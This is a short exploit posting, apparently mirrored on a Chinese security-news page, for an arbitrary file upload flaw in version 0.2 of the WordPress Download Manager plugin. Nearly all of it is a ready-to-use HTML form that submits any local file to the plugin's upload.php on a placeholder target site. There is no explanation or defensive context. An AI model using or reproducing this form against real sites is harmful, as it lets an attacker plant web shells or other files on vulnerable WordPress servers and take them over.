Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
|
来源: www.biyosecurity.com 作者:biyosecurity 发布时间:2008-07-25
|
|
<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>SaO</h3> <h4>BiyoSecurityTeam || www.biyosecurity.com</h4> <i>Plugin URI: http://giulioganci.netsons.org/downloads-manager<i> <hr color="#f0f8ff"> <fieldset name="upl" class="options">
<form action="http://[site]/wp-content/plugins/downloads-manager/upload.php?up=http://[site]/wp-content/plugins/downloads-manager/upload/" method="post" enctype="multipart/form-data" name="upload"> <table cellspacing="0" cellpadding="3"> <tr> <td>Local File</td> </tr> <tr> <td><input name="upfile" type="file" id="upfile" size="50"><input type="hidden" name="MAX_FILE_SIZE" value="2048"></td> <td><input type="submit" name="up" value="Send" class="button" /></td> </tr> </table> </form> </fieldset>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|